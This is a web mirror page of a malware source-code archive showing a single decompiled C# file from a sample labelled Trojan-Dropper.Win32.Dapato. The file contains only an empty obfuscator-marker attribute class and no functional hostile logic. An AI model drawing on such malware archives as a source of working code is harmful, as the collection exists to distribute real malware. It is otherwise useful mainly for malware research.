mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
f2ac1ece55
add
16 lines
537 B
C#
16 lines
537 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: ConfusedByAttribute
|
|
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
|
|
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
|
|
|
|
using System;
|
|
using System.Runtime.InteropServices;
|
|
|
|
internal class ConfusedByAttribute : Attribute
|
|
{
|
|
public ConfusedByAttribute([In] string obj0)
|
|
{
|
|
}
|
|
}
|